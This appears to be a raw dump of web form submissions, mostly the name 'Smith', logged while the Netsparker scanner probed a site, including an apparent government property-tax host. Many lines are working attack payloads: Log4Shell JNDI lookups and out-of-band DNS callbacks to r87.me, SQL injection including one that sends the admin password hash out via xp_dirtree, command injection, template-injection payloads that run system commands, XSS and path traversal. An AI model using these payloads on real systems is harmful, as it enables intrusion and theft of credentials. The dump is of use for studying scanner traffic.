4597 ${j${env:bmV0c3Bhcmtlcg:-n}di:dns://tbiqveds${lower:q}6vnn3pwym4ym2ayoxgrxzrkxx_zjawafam.r87.me}
4598 ${${::-j}${::-n}${::-d}${::-i}:${::-d}${::-n}${::-s}://tbiqvedsq6pd3d2ik0nl21ftzjxpqjjet8lh1a${lower
4599 Smith
4600
4601
4602 Smith
4603 Smith
4604
4605 Smith
4606 Smith
4607 Smith
4608 Smith
4609 Smith
4610
4611 Smith
4612 Smith
4613 Smith
4614 Smith
4615 Smith
4616 Smith
4617 Smith
4618 Smith
4619 Smith %27%22%2f%24%5b%5d.%3e
4620 Smith
4621
4622 http://r87.me/r/?id=tbiqvedsq64xrle7inrs1arblic6svzqberogd-fldu
4623 Smith
4624 Smith
4625
4626 Smith '"/$[].>
4627
4628 Smith
4629
4630 Smith
4631 ns:netsparker056650=vuln
4632 Smith
4633
4634 Smith
4635
4636
4637 Smith
4638 Smith
4639 Smith
4640
4641 Smith
4642 Smith
4643
4644 Smith
4645 %27%22%2f%24%5b%5d.%3e
4646 Smith
4647 Smith
4648
4649 Smith
4650 Smith
4651 Smith
4652 Smith
4653 Smith
4654 Smith
4655 Smith
4656
4657 ${${::-j}${::-n}${::-d}${::-i}:${::-d}${::-n}${::-s}://tbiqvedsq6iv2tola${lower:m}wrskh6q0byzqbwcyzl
4658 Smith
4659 Smith
4660 Smith
4661 Smith
4662
4663 Smith
4664 Smith
4665 Smith
4666 Smith
4667 Smith
4668 Smith
4669 Smith
4670 Smith
4671 http://r87.com/n?.php
4672 Smith
4673 Smith
4674 Smith
4675 Smith
4676
4677 Smith
4678
4679 Smith
4680 Smith
4681 Smith
4682 Smith
4683 Smith
4684 Smith
4685 Smith
4686 Smith
4687 Smith
4688 Smith
4689 Smith
4690 Smith
4691 http://tbiqvedsq61r9cdxbhemlal-uxarnc_xd-objbc-6ld.r87.me/p/
4692 Smith
4693 Smith
4694 Smith
4695 Smith
4696 Smith
4697
4698 Smith
4699 Smith
4700 Smith
4701 Smith
4702
4703 Smith
4704 Smith
4705
4706 php://filter//resource=http://r87.com/n?.php
4707 Smith
4708
4709
4710 Smith
4711 Smith
4712
4713 Smith
4714 Smith
4715 Smith
4716 Smith
4717 Smith
4718 ${jndi:dns://tbiqvedsq6apcnt4u${lower:t}pjkfs50pob7r3p1kdq-hg6poi.r87.me}
4719
4720
4721 Smith
4722
4723 Smith
4724 Smith
4725
4726 ${j${env:bmV0c3Bhcmtlcg:-n}di:dns://tbiqvedsq6yieqeazfi6vrveiofkc0ml1wmrkszdl${lower:l}o.r87.me}
4727 Smith ${jndi:dns://tbiqvedsq6fhy4buqt${lower:j}0zl5hfvl_7vrlr_aejd9jvoo.r87.me}
4728 Smith
4729
4730 php://filter//resource=http://r87.com/n?.php
4731 Smith
4732 r87.com/n
4733 Smith
4734 Smith
4735 php://filter//resource=http://tbiqvedsq6_7tfrk5bpkknewstuehqdrm5stk6thy3n.r87.me/p/
4736 Smith
4737 tbiqvedsq6qsnpgwqyumutcyvcna3cwgb--87zntnij.r87.me/p/
4738 Smith
4739
4740 Smith
4741 Smith
4742 Smith
4743 Smith
4744 Smith
4745 Smith
4746 Smith
4747 Smith
4748 Smith
4749 Smith
4750
4751 Smith
4752 Smith
4753 Smith
4754
4755 Smith ${j${env:bmV0c3Bhcmtlcg:-n}di:dns://tbiqvedsq6do0qjdu3hqx9to6stw00wfgbuncnki${lower:n}jk.r87.me}
4756 ns:netsparker056650=vuln
4757 ns:netsparker056650=vuln
4758
4759 tbiqvedsq60sqjegss2hmj76zrmavmyxuu-rdhxffnp.r87.me/p/
4760 Smith
4761 Smith
4762
4763
4764 Smith
4765 Smith
4766 Smith
4767
4768 Smith
4769 Smith
4770
4771 Smith
4772
4773 Smith
4774 Smith
4775 Smith
4776 Smith
4777 Smith //tbiqvedsq6ktrkmb4dupnqxmpdsf9ijaeohbwb0arpw.r87.me
4778 //tbiqvedsq6nv_zazak9caoki6yjsfmjr_0ugl6qnivq.r87.me
4779 Smith
4780 Smith tbiqvedsq6ngz2wntoo1opuhhf12o7egjzvt0ouedig.r87.me
4781 Smith
4782 Smith
4783 Smith
4784 Smith
4785 Smith
4786 Smith
4787 Smith
4788
4789 Smith
4790 Smith http://tbiqvedsq6rce9doz0ztbveapbih_pfgbogskglhx6j.r87.me/p/
4791 Smith
4792
4793 php://filter//resource=http://tbiqvedsq6-f-wdts9bk_hrpvjbhy_hw1qqzccqmr2p.r87.me/p/
4794 Smith
4795 Smith
4796
4797 Smith
4798 Smith
4799
4800 Smith
4801 Smith
4802 tbiqvedsq6lms0lssmhq0fc-p5nxj58tkycu45sjoob.r87.me/p/
4803 Smith
4804 Smith
4805 Smith
4806 Smith
4807
4808
4809
4810 Smith
4811 Smith
4812 Smith
4813 ${${::-j}${::-n}${::-d}${::-i}:${::-d}${::-n}${::-s}://tbiqvedsq6q1jdn41ab19awqr8eh_utova0${lower:a}n3bluqs.r87.me}
4814 Smith
4815 Smith
4816 Smith
4817 Smith
4818 Smith
4819 Smith
4820 Smith
4821 Smith
4822 Smith
4823 Smith
4824 Smith
4825 Smith
4826 Smith
4827 Smith
4828 Smith tbiqvedsq6zrpm4p3kvp1bykxxu4txptul9uygix15v.r87.me/p/
4829 Smith
4830 ';sleep(25000);ns();' /* 8264000c-09fc-47b6-b179-0e5d781d1011 */
4831 Smith
4832 Smith
4833 Smith
4834 Smith
4835 Smith
4836 Smith
4837 Smith
4838 Smith
4839
4840 Smith
4841 Smith
4842 Smith
4843
4844
4845 Smith
4846 Smith
4847
4848 Smith
4849 Smith ${${::-j}${::-n}${::-d}${::-i}:${::-d}${::-n}${::-s}://tbiqvedsq6u_v3cuzqd509wf8tyjsnyvzlyn${lower:j}efta-8.r87.me}
4850
4851 Smith
4852 Smith
4853 Smith
4854 Smith
4855 Smith
4856 Smith ';sleep(25000);ns();' /* 82a8abe1-03b0-4cff-8aee-2a42dcec801f */
4857 Smith
4858 Smith
4859 Smith
4860 Smith
4861
4862 Smith
4863 Smith
4864 Smith
4865
4866 Smith
4867 Smith
4868 Smith
4869 Smith
4870 Smith
4871 Smith
4872
4873 Smith
4874 Smith
4875 Smith
4876 Smith
4877 Smith
4878 Smith
4879 Smith
4880 Smith
4881
4882
4883 Smith
4884
4885 Smith
4886 Smith
4887 Smith
4888
4889 Smith
4890 Smith
4891 Smith
4892 Smith
4893 Smith
4894
4895
4896 Smith
4897 Smith
4898
4899 Smith
4900
4901
4902 Smith
4903 Smith
4904
4905 Smith
4906
4907
4908
4909 Smith
4910 Smith http://r87.com/n?.php
4911 Smith
4912
4913 Smith
4914
4915 Smith
4916
4917 Smith
4918 Smith
4919
4920 http://r87.com/n?.php
4921 %27%3bsleep%2825000%29%3bns%28%29%3b%27 /* db74f270-0f5d-4158-a09b-b3777dc23a5e */
4922 {{268409241-78122}}
4923 Smith
4924
4925 Smith
4926 http://r87.com/n?.php
4927
4928 Smith
4929 {{268409241-6755}}
4930 Smith
4931
4932
4933 Smith %27%3bsleep%2825000%29%3bns%28%29%3b%27 /* 0dd97c7f-7027-4572-8388-39df50d84af0 */
4934
4935
4936 Smith php://filter//resource=http://r87.com/n?.php
4937 Smith
4938
4939 Smith http://r87.com/n?.php
4940 Smith
4941
4942 Smith
4943
4944 Smith
4945
4946 Smith
4947 Smith
4948 Smith
4949 Smith
4950 Smith
4951 Smith
4952 Smith
4953 Smith
4954 Smith
4955 Smith
4956 Smith
4957
4958 Smith
4959 Smith
4960
4961 Smith
4962 Smith
4963 Smith
4964 Smith
4965 Smith
4966 Smith
4967 Smith
4968 Smith
4969 ns:netsparker056650=vuln
4970
4971 Smith
4972
4973 Smith
4974
4975 Smith
4976
4977 Smith
4978
4979 Smith
4980 Smith
4981
4982
4983 Smith
4984
4985 Smith
4986
4987
4988 Smith
4989 Smith
4990 Smith
4991 Smith
4992 Smith
4993 Smith
4994 Smith
4995
4996 Smith
4997 Smith
4998
4999 Smith
5000 Smith
5001 Smith
5002 Smith
5003 Smith
5004 Smith
5005 Smith
5006 Smith
5007 Smith
5008 Smith
5009 Smith
5010
5011 Smith
5012 Smith
5013 Smith
5014
5015 r87.com/n
5016 Smith
5017 Smith
5018 Smith
5019
5020 Smith
5021 Smith
5022 Smith
5023 Smith
5024 Smith
5025 Smith
5026 Smith
5027 =268409241-65898
5028
5029 Smith
5030 Smith
5031 Smith
5032 Smith ns:netsparker056650=vuln
5033 Smith
5034 Smith
5035 Smith
5036 Smith
5037 Smith
5038 Smith
5039 Smith
5040 Smith
5041 Smith
5042 Smith
5043 Smith
5044 Smith
5045 Smith
5046 Smith
5047 Smith
5048 Smith
5049 Smith
5050 Smith
5051
5052 Smith
5053 Smith
5054 Smith
5055 Smith
5056 Smith
5057 Smith
5058 Smith
5059 Smith
5060 Smith
5061 Smith
5062 Smith
5063 Smith
5064 Smith
5065 Smith
5066 Smith
5067 Smith
5068 http://example.com/? ns: netsparker056650=vuln
5069 <%- 268409241-54566 %>
5070
5071 Smith
5072
5073
5074
5075 Smith
5076 Smith
5077 Smith
5078 Smith
5079 Smith
5080 Smith
5081
5082 Smith
5083 Smith
5084 Smith
5085 Smith
5086 Smith
5087 Smith
5088 Smith
5089 Smith
5090
5091 Smith http://example.com/? ns: netsparker056650=vuln
5092 Smith
5093 Smith
5094 Smith
5095
5096 Smith
5097 Smith
5098
5099 Smith
5100 Smith
5101 Smith
5102 Smith
5103 Smith
5104 Smith
5105 Smith
5106 Smith
5107 Smith
5108 Smith
5109
5110 Smith
5111 Smith
5112 Smith
5113 Smith
5114 <#assign x=268409241 - 76085> ${x?string["0"]}
5115
5116 Smith ns:netsparker056650=vuln
5117 ns:netsparker056650=vuln
5118 <%- 268409241-68301 %>
5119 Smith
5120
5121 Smith
5122 Smith
5123 Smith
5124 Smith
5125 Smith
5126
5127 Smith
5128
5129
5130 Smith
5131 Smith
5132 Smith
5133 Smith
5134 Smith
5135 Smith
5136 Smith
5137 Smith
5138 <%= "#{268409241-60436}" %>
5139 Smith
5140
5141 Smith
5142
5143 Smith
5144
5145 Smith
5146
5147
5148
5149 Smith
5150
5151 Smith
5152 Smith
5153
5154 Smith
5155
5156 Smith
5157 Smith
5158 Smith
5159
5160 -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
5161 Smith
5162
5163
5164 N3tSp4rK3R
5165 Smith
5166
5167 Smith
5168 Smith
5169 Smith
5170 Smith
5171
5172
5173 -1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
5174
5175 Smith
5176
5177 Smith
5178 Smith
5179 Smith
5180
5181
5182 NS09
5183 NS09
5184 Smith
5185 Smith
5186
5187 Smith
5188 Smith
5189 Smith
5190 Smith
5191 Smith
5192 Smith
5193 Smith
5194 Smith
5195
5196 Smith
5197 Smith
5198
5199 Smith
5200
5201 Smith
5202 Smith
5203 Smith
5204 Smith
5205 Smith
5206 Smith
5207 Smith
5208 Smith
5209 Smith
5210 Smith
5211
5212 Smith
5213 Smith
5214 createobject("WScript.Shell").exec("nslookup tbiqvedsq69lbqnnmnzudafdzuxyskpgst7-8bde" & "nhi.r87.me
5215 Smith
5216 Smith
5217 Smith
5218 Smith
5219 Smith
5220
5221 Smith
5222 Smith
5223
5224
5225 Smith
5226 Smith
5227 Smith
5228 Smith
5229 Smith
5230 Smith
5231 Smith
5232 Smith
5233 Smith
5234
5235
5236 Smith
5237 Smith
5238 Smith
5239
5240 Smith
5241 Smith
5242 Smith
5243 Smith -1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
5244
5245 createobject("WScript.Shell").exec("nslookup tbiqvedsq6-wm5--0czwwbfrrfhkozdmhbtw53op" & "8b0.r87.me
5246
5247 Smith
5248 ns:netsparker056650=vuln
5249 Smith
5250 +createobject("WScript.Shell").exec("nslookup tbiqvedsq6k0be5tq2oq3wka4vpubjpdstzhapjc" & "j6m.r87.m
5251 Smith
5252
5253 Smith
5254 Smith
5255
5256 http://example.com/? ns: netsparker056650=vuln
5257 ns:netsparker056650=vuln
5258
5259 Smith
5260 Smith
5261 http://example.com/? ns: netsparker056650=vuln
5262 Smith
5263
5264 "+createobject("WScript.Shell").exec("nslookup tbiqvedsq6v-pf5mte3onjbyi6qugin7xs569fwv" & "vhi.r87.
5265 Smith
5266 Smith
5267
5268 Smith
5269 ${28275*28275-(27000)}
5270
5271 Smith
5272 Smith
5273
5274 Smith
5275 Smith
5276
5277
5278
5279
5280 Smith
5281
5282 Smith
5283 Smith
5284 Smith
5285 Smith
5286 Smith
5287 Smith
5288 Smith
5289 Smith
5290 Smith
5291 Smith
5292 Smith
5293 Smith
5294 Smith
5295 Smith
5296 Smith
5297 Smith
5298
5299 Smith
5300 Smith
5301 Smith
5302 Smith
5303 Smith
5304 Smith
5305 Smith
5306
5307
5308 Smith
5309 Smith
5310 Smith
5311 Smith
5312 Smith
5313 Smith
5314 Smith
5315 Smith
5316 (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
5317 Smith
5318 Smith
5319 Smith
5320
5321 Smith
5322
5323 Smith
5324 Smith
5325
5326 Smith
5327 Smith
5328 Smith
5329
5330 Smith
5331 Smith
5332 Smith
5333 Smith
5334 Smith
5335
5336 Smith
5337
5338
5339 Smith
5340 Smith
5341
5342 Smith
5343
5344 Smith
5345 Smith
5346 Smith
5347 Smith
5348 Smith
5349
5350 Smith
5351 Smith
5352 Smith
5353 Smith
5354 Smith
5355 Smith
5356 Smith
5357 Smith
5358 Smith
5359 Smith
5360 Smith
5361
5362 Smith
5363
5364 Smith
5365 Smith
5366 Smith
5367 Smith
5368 Smith
5369 Smith
5370 Smith
5371
5372 Smith
5373 hTTp://r87.com/n
5374 Smith
5375 Smith (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
5376 ns:netsparker056650=vuln
5377 Smith
5378 declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+'.tbiqvedsq6j0xcztsr1ifcrnvcy04bhqz0c6hebu'+'rtw.r87.me' from sys.sql_logins WHERE principal_id=1;exec('xp_dirtree ''\\'+@h+'\c$''')
5379 nslookup tbiqvedsq6ewinoxy73w8mdjj5icsml1g-bkhepq^tmu.r87.me&'\"`0&nslookup tbiqvedsq6ewinoxy73w8mdj
5380 Smith
5381 Smith
5382 Smith
5383 Smith
5384
5385
5386 Smith
5387
5388 Smith
5389
5390
5391
5392 Smith
5393 Smith
5394 Smith
5395 -1 OR 1=1
5396 Smith
5397
5398 Smith
5399
5400 Smith
5401
5402
5403 Smith ns:netsparker056650=vuln
5404
5405
5406 Smith
5407
5408 Smith
5409 Smith
5410 Smith
5411
5412
5413 Smith
5414 Smith %27%3bsleep%2825000%29%3bns%28%29%3b%27 /* 352a1ac7-4cb3-4224-af20-d90d56083a48 */
5415 Smith
5416 Smith
5417 Smith
5418
5419 Smith
5420 ";l=document.createElement("link");l.rel="prefetch";l.href="//tbiqvedsq6s2v13t2kyym6xzefvn2ncn1h59pb
5421 Smith
5422 Smith
5423
5424
5425 '{${print(int)0xFFF9999-39257}}'
5426 tbiqvedsq6rovax9agtcqy5cfe_srjue4ffra8giner.r87.me/p/
5427 Smith http://r87.com/n?.aspx
5428
5429 Smith
5430 Smith
5431
5432 Smith
5433 Smith
5434 ns:netsparker056650=vuln
5435 Smith
5436
5437 data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDUxRDEzKTwvc2NyaXB0Pg==
5438 Smith
5439 Smith tbiqvedsq6sqpdhpx_kudpmfddh7zyfybpuw4npbjqb.r87.me/p/
5440
5441 <%- 268409241-43027 %>
5442 Smith
5443
5444 dblink_connect('host=tbiqvedsq6wntjcimdtrd54xgictzqrmboetq8de'||'fgc.r87.me user=a password=a connect_timeout=2')
5445
5446 Smith http://r87.me/r/?id=tbiqvedsq6mpmznedxulq4uz0c6vc5yj4ipwjrruhse
5447 Smith
5448 nslookup "tbiqvedsq6zd9mwuxbysufumt-uzdu2fwhbn3otj""yli.r87.me"
5449
5450
5451
5452 Smith
5453
5454 Smith
5455 Smith
5456 Smith
5457
5458 Smith
5459 Smith
5460
5461 Smith
5462 <%= "#{268409241-33983}" %>
5463 Smith
5464 Smith
5465 Smith
5466 %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#c
5467 Smith %27%3bsleep%281000%29%3bns%28%29%3b%27 /* 358b0234-fb96-4ed5-9924-a2d701cf2534 */
5468 Smith
5469 Smith
5470 Smith
5471
5472
5473 Smith
5474
5475 Smith
5476 Smith -1 OR 1=1
5477 Smith
5478 Smith
5479 Smith -1 OR 1=1
5480 Smith
5481
5482 '+print localtime()*0+0xFFF9999-27168+'
5483 '& SET /A 0xFFF9999-17677 &
5484
5485 Smith
5486 Smith
5487
5488 <%- global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgdGJpcXZlZHNxNm1q
5489 Smith (select UTL_INADDR.GET_HOST_ADDRESS('tbiqvedsq66a2emzdbssyepxa-6zoa-uigpnvte2'||'qgq.r87.me') from DUAL)
5490
5491 {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("nslookup tbiqvedsq6nd2
5492 ' OR 0=1 OR
5493
5494 Smith
5495
5496
5497
5498 Smith
5499 NS-1NO
5500 {php}Smarty_Resource::parseResourceName(system("nslookup tbiqvedsq6qb8_rrjpet42vm-7my4fqimrzuprrp"."
5501
5502
5503 Smith
5504
5505 SET /A 0xFFF9999-47917
5506
5507
5508
5509
5510 Smith
5511
5512 Smith
5513
5514 Smith
5515 Smith
5516 -1 OR 1=1
5517
5518
5519 Smith
5520
5521 Smith
5522 Smith
5523 Smith
5524 Smith
5525 Smith
5526 Smith
5527 1";expr 268409241 - 94026;"
5528
5529 Smith
5530
5531
5532 Smith
5533 (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('tbiqvedsq6k9n1kukaeijes3e9ctgexyph_dv3m4'||'l-w.r87.me') from DUAL))))
5534 -1 OR 1=1
5535 -1 OR 1=1
5536 1';expr 268409241 - 95621;'
5537 Smith
5538 Smith
5539
5540 Smith
5541 Smith
5542 ' OR 0=1 OR
5543 Smith
5544 Smith
5545 Smith
5546
5547
5548
5549 1";expr 268409241 - 96914;"
5550 Smith
5551
5552 Smith
5553 javascript:netsparker(0x051D75)
5554
5555
5556
5557 Smith
5558 NS-1NO
5559 Smith
5560 Smith
5561 Smith javascript:netsparker(0x051D76)
5562 Smith
5563
5564
5565 Smith
5566
5567 Smith
5568 Smith ' OR 0=1 OR
5569 Smith NS NO
5570
5571 Smith
5572 Smith
5573 Smith
5574 Smith
5575 Smith
5576 -1 OR 'X'='ss
5577 Smith
5578 -1' OR 1=1 OR 'ns'='ns
5579 -1" OR 1=1 OR "ns"="ns
5580
5581 Smith
5582 -1 OR 17-7=10
5583
5584 Smith
5585 {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("nslookup tbiqvedsq6eu0
5586
5587 -1' OR 1=1 OR '1'='1
5588 Smith
5589 -1' OR 1=1 OR '1'='1
5590
5591 Smith
5592
5593
5594
5595
5596 Smith
5597
5598 Smith
5599 Smith
5600 -1" OR 1=1 OR "1"="1
5601
5602 Smith
5603 Smith
5604 Smith
5605 Smith
5606 Smith
5607 Smith
5608 Smith
5609 Smith
5610
5611
5612 Smith
5613 Smith
5614 Smith
5615 Smith ns:netsparker056650=vuln
5616 Smith
5617
5618 Smith
5619 Smith
5620
5621 Smith
5622 -1 OR 'X'='ss
5623
5624 Smith
5625 Smith
5626 Smith
5627 ${28275*28275-(15248)}
5628 Smith
5629 ns:netsparker056650=vuln
5630 <%= "#{(require'base64';%x(#{Base64.urlsafe_decode64('bnNsb29rdXAgdGJpcXZlZHNxNnNjMzZjcnhkeHB3ejQybH
5631 1;expr 268409241 - 99632;x
5632 Smith
5633 Smith
5634 Smith
5635 /../../../../../../../../../../boot.ini
5636
5637 http://example.com/? ns: netsparker056650=vuln
5638 http://example.com/? ns: netsparker056650=vuln
5639 Smith
5640
5641 Smith
5642 <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("cmd.exe /c nslookup tbiqvedsq6rszqwzg
5643
5644 Smith
5645 ns:netsparker056650=vuln
5646 Smith '||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('tbiqvedsq6dmgnbvuzr_8werat1gtqgkcjyduahw'||'dqw.r87.me') from DUAL))||'
5647
5648
5649 Smith
5650 Smith /../../../../../../../../../../boot.ini.php
5651
5652 Smith
5653 Smith
5654 Smith
5655
5656 Smith
5657 Smith
5658
5659
5660 Smith
5661 Smith
5662
5663 __import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgdGJpcXZlZHNxNmR4d2RkMDRfa
5664 Smith
5665
5666
5667
5668 Smith
5669 '+netsparker(0x051D81)+'
5670 Smith
5671
5672 Smith
5673 Smith
5674 Smith
5675
5676 |expr 268409241 - 73498
5677 Smith '+netsparker(0x051D82)+'
5678 |expr 268409241 - 2457
5679 Smith
5680
5681 Smith
5682 Smith
5683 expr 268409241 - 64999
5684 Smith
5685
5686 Smith */netsparker(0x051D80);/*
5687
5688 Smith
5689 */netsparker(0x051D7F);/*
5690
5691
5692 Smith
5693 Smith
5694 Smith
5695 expr 268409241 - 59085
5696 require 'resolv';Resolv.getaddress ("tbiqvedsq6qebeaagnc40kiqksiid656ljcordz7".concat "voq.r87.me")
5697
5698 Smith
5699 Smith
5700 __import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgdGJpcXZlZHNxNnFyeWo4ZGs4X
5701 Smith
5702 Smith
5703 Smith
5704 Smith
5705 Smith
5706 Smith
5707 SET /A 0xFFF9999-60203 &
5708 http://r87.com/n?.php
5709 Smith (select UTL_INADDR.GET_HOST_ADDRESS(chr(116)||chr(98)||chr(105)||chr(113)||chr(118)||chr(101)||chr(100)||chr(115)||chr(113)||chr(54)||chr(106)||chr(109)||chr(116)||chr(101)||chr(120)||chr(114)||chr(121)||chr(117)||chr(111)||chr(111)||chr(98)||chr(100)||chr(104)||chr(115)||chr(53)||chr(95)||chr(98)||chr(113)||chr(116)||chr(50)||chr(105)||chr(109)||chr(105)||chr(120)||chr(109)||chr(100)||chr(50)||chr(48)||chr(97)||chr(109)||chr(107)||chr(120)||chr(115)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)
5710 Smith
5711 Smith
5712 Smith http://r87.com/n?.php
5713
5714
5715
5716 Smith
5717 (select UTL_INADDR.GET_HOST_ADDRESS(chr(116)||chr(98)||chr(105)||chr(113)||chr(118)||chr(101)||chr(100)||chr(115)||chr(113)||chr(54)||chr(108)||chr(110)||chr(97)||chr(100)||chr(95)||chr(100)||chr(101)||chr(115)||chr(50)||chr(107)||chr(111)||chr(100)||chr(95)||chr(55)||chr(106)||chr(121)||chr(102)||chr(101)||chr(104)||chr(105)||chr(108)||chr(109)||chr(109)||chr(118)||chr(114)||chr(100)||chr(108)||chr(101)||chr(107)||chr(54)||chr(54)||chr(105)||chr(48)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)
5718
5719 Smith -1 OR 1=1
5720
5721
5722 Smith
5723 Smith
5724 Smith %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
5725
5726 Smith
5727
5728 Smith -1 OR 1=1
5729
5730 Smith -1 OR 1=1
5731 Smith
5732 Smith
5733 Smith
5734 Smith
5735
5736 1';expr 268409241 - 94522;'
5737 Smith
5738
5739 https://propertytax.jk.gov.in/trace.axd
5740
5741 Smith
5742 Smith
5743 Smith ' OR 1=1 OR '1'='1
5744 <%- 268409241-19256 %>
5745
5746
5747 Smith
5748
5749 Smith
5750 Smith
5751 Smith " OR 1=1 OR "1"="1
5752 Smith
5753
5754 Smith
5755 Smith ' OR 0=1 OR
5756 Smith
5757 {{268409241-16555}}
5758
5759 Smith ns:netsparker056650=vuln
5760 Smith
5761 Smith 164.100.223.17/trace.axd
5762 Smith
5763
5764 Smith NS NO
5765 Smith
5766
5767 Smith %22%2bnetsparker(0x051E5C)%2b%22
5768
5769
5770 Smith
5771
5772 N3tSp4rK3R
5773
5774 =268409241-89604
5775
5776 Smith
5777
5778 Smith
5779
5780 =268409241-69823
5781 Smith -1 OR 1=1
5782 Smith
5783 <%- 268409241-92171 %>
5784 Smith -1 OR 1=1
5785
5786 Smith
5787 Smith
5788 <#assign x=268409241 - 4356> ${x?string["0"]}
5789
5790 Smith
5791
5792 Smith
5793
5794 Smith ' OR 0=1 OR
5795 Smith
5796
5797 Smith
5798 Smith
5799 Smith
5800
5801 Smith -1 OR 1=1
5802 Smith NS NO
5803
5804 Smith
5805 Smith
5806
5807 Smith
5808 Smith
5809 Smith
5810
5811
5812 Smith
5813
5814 file%3a%2f%2f%2fboot.ini
5815 Smith
5816 Smith
5817 expr 268409241 - 30467;
5818 Smith
5819 Smith
5820 Smith
5821 Smith
5822 Smith
5823 expr 268409241 - 75714
5824
5825 Smith
5826 Smith
5827 expr 268409241 - 76768
5828
5829 expr 268409241 - 55426;
5830 Smith
5831 |expr${IFS}268409241${IFS}-${IFS}88182
5832 Smith
5833
5834
5835 Smith
5836
5837 <%- 268409241-19803 %>
5838 Smith
5839 Smith
5840 Smith
5841 Smith
5842 <#assign x=268409241 - 18819> ${x?string["0"]}
5843 <%= "#{268409241-34180}" %>
5844 <#assign x=268409241 - 81367> ${x?string["0"]}
5845 Smith
5846
5847
5848
5849 127.100.11.2/trace.axd
5850
5851 Smith <#assign x=268409241 - 5057> ${x?string["0"]}
5852 Smith
5853 Smith
5854 Smith
5855 Smith -1 OR 17-7=10
5856 Smith
5857 Smith
5858 Smith
5859 Smith
5860
5861 Smith
5862 Smith OR NS='ss
5863 Smith ' OR 1=1 OR '1'='1
5864
5865 ${28275*28275-(53674)}
5866 Smith
5867 Smith
5868 Smith
5869 #{28275*28275-(81079)}
5870 |expr${IFS}268409241${IFS}-${IFS}48332
5871 //r87.com/n/j/?0x051E85
5872 Smith " OR 1=1 OR "1"="1
5873
5874 Smith #{28275*28275-(82590)}
5875 Smith
5876
5877 Smith
5878
5879 Smith
5880
5881 Smith OR 'X'='ss
5882 <%= "#{268409241-92019}" %>
5883 Smith
5884 Smith <%= "#{268409241-15917}" %>
5885 @(268409241-99538)
5886
5887 Smith ' OR 1=1 OR '1'='1
5888
5889 Smith ' OR 1=1 OR 'ns'='ns
5890 Smith
5891 |expr 268409241 - 74947
5892
5893 Smith
5894 Smith " OR 1=1 OR "ns"="ns
5895 Smith
5896 Smith
5897 Smith " OR 1=1 OR "1"="1
5898 |expr 268409241 - 25532
5899 Smith
5900 Smith
5901 Smith
5902 Smith
5903 Smith
5904 Smith
5905 Smith
5906 Smith
5907
5908 Smith
5909
5910
5911 Smith
5912
5913
5914 Smith
5915 Smith
5916 Smith
5917
5918
5919 Smith
5920
5921 Smith
5922 Smith
5923
5924 Smith
5925
5926 Smith
5927 (268409241-75769)
5928 Smith
5929
5930
5931 ' WAITFOR DELAY '0:0:25'-- /* 39303e91-83c7-44bd-8630-f4ad6d61a566 */
5932 Smith
5933 Smith
5934 Smith
5935 Smith
5936 Smith 127.100.11.2/trace.axd
5937 -1'||1=='1
5938 Smith
5939 -1'||'N'=='3
5940
5941 "& SET /A 0xFFF9999-63051 &
5942 Smith
5943 Smith
5944 Smith
5945 %27
5946
5947
5948 Smith
5949
5950 Smith
5951
5952 Smith
5953 Smith
5954 Smith
5955
5956 Smith
5957 (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
5958
5959 Smith
5960
5961 Smith
5962
5963 Smith
5964
5965 http://r87.me/r/?id=tbiqvedsq6pohzbuacp5f56wbx_elzlic8ocu2qb-vq
5966 Smith @(268409241-74648)
5967 Smith
5968
5969 Smith
5970
5971
5972 Smith (268409241-72829)
5973 Smith
5974
5975 Smith
5976
5977 Smith
5978 (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109)
5979
5980 Smith
5981 Smith
5982
5983 Smith "& SET /A 0xFFF9999-72042 &
5984
5985
5986 {{ 268409241- 63669 }}
5987 Smith
5988 -1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52
5989
5990 Smith
5991 cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||c
5992 Smith
